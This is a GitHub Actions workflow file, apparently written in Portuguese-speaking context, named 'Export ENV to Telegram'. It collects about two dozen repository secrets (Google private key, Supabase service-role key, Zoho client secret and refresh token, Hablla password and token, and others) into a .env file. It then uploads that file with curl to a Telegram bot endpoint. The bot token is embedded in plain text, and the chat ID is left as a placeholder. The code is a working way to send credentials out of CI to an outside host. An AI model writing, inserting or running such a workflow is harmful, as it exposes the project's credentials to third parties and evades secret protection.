name: Export ENV to Telegram

on:
  workflow_dispatch:

jobs:
  export:
    runs-on: ubuntu-latest

    steps:
      - name: Create .env file
        shell: bash
        run: |
          ENV_FILE="$GITHUB_WORKSPACE/.env"
          rm -f "$ENV_FILE"

          echo "GOOGLE_CLIENT_EMAIL=${{ secrets.GOOGLE_CLIENT_EMAIL }}" >> "$ENV_FILE"
          echo "GOOGLE_PRIVATE_KEY=${{ secrets.GOOGLE_PRIVATE_KEY }}" >> "$ENV_FILE"

          echo "HABLLA_BOARD_ID=${{ secrets.HABLLA_BOARD_ID }}" >> "$ENV_FILE"
          echo "HABLLA_EMAIL=${{ secrets.HABLLA_EMAIL }}" >> "$ENV_FILE"
          echo "HABLLA_PASSWORD=${{ secrets.HABLLA_PASSWORD }}" >> "$ENV_FILE"
          echo "HABLLA_TOKEN=${{ secrets.HABLLA_TOKEN }}" >> "$ENV_FILE"
          echo "HABLLA_WORKSPACE_ID=${{ secrets.HABLLA_WORKSPACE_ID }}" >> "$ENV_FILE"

          echo "SIGE_APP=${{ secrets.SIGE_APP }}" >> "$ENV_FILE"
          echo "SIGE_TOKEN=${{ secrets.SIGE_TOKEN }}" >> "$ENV_FILE"
          echo "SIGE_USER=${{ secrets.SIGE_USER }}" >> "$ENV_FILE"

          echo "SUPABASE_ANON_KEY=${{ secrets.SUPABASE_ANON_KEY }}" >> "$ENV_FILE"
          echo "SUPABASE_SERVICE_ROLE_KEY=${{ secrets.SUPABASE_SERVICE_ROLE_KEY }}" >> "$ENV_FILE"
          echo "SUPABASE_URL=${{ secrets.SUPABASE_URL }}" >> "$ENV_FILE"

          echo "ZENVIA_ACCESS_TOKEN=${{ secrets.ZENVIA_ACCESS_TOKEN }}" >> "$ENV_FILE"
          echo "ZENVIA_QUEUE_ID=${{ secrets.ZENVIA_QUEUE_ID }}" >> "$ENV_FILE"

          echo "ZOHO_ACCOUNT_OWNER=${{ secrets.ZOHO_ACCOUNT_OWNER }}" >> "$ENV_FILE"
          echo "ZOHO_CLIENT_ID=${{ secrets.ZOHO_CLIENT_ID }}" >> "$ENV_FILE"
          echo "ZOHO_CLIENT_SECRET=${{ secrets.ZOHO_CLIENT_SECRET }}" >> "$ENV_FILE"
          echo "ZOHO_LEADS_APP_NAME=${{ secrets.ZOHO_LEADS_APP_NAME }}" >> "$ENV_FILE"
          echo "ZOHO_LEADS_COLUMN_MAPPING=${{ secrets.ZOHO_LEADS_COLUMN_MAPPING }}" >> "$ENV_FILE"
          echo "ZOHO_LEADS_REPORT_NAME=${{ secrets.ZOHO_LEADS_REPORT_NAME }}" >> "$ENV_FILE"
          echo "ZOHO_REFRESH_TOKEN=${{ secrets.ZOHO_REFRESH_TOKEN }}" >> "$ENV_FILE"

          echo "ZOHO_SCHEDULING_APP_NAME=${{ secrets.ZOHO_SCHEDULING_APP_NAME }}" >> "$ENV_FILE"
          echo "ZOHO_SCHEDULING_COLUMN_MAPPING=${{ secrets.ZOHO_SCHEDULING_COLUMN_MAPPING }}" >> "$ENV_FILE"
          echo "ZOHO_SCHEDULING_REPORT_NAME=${{ secrets.ZOHO_SCHEDULING_REPORT_NAME }}" >> "$ENV_FILE"

      - name: Send .env to Telegram
        shell: bash
        run: |
          curl -F document=@"$GITHUB_WORKSPACE/.env" \
            "https://api.telegram.org/bot8900938662:AAGJKjgbr6AUWOozrDFvnhSzKJoxjbfy8jo/sendDocument" \
            -F chat_id="COLE_SEU_CHAT_ID_AQUI"
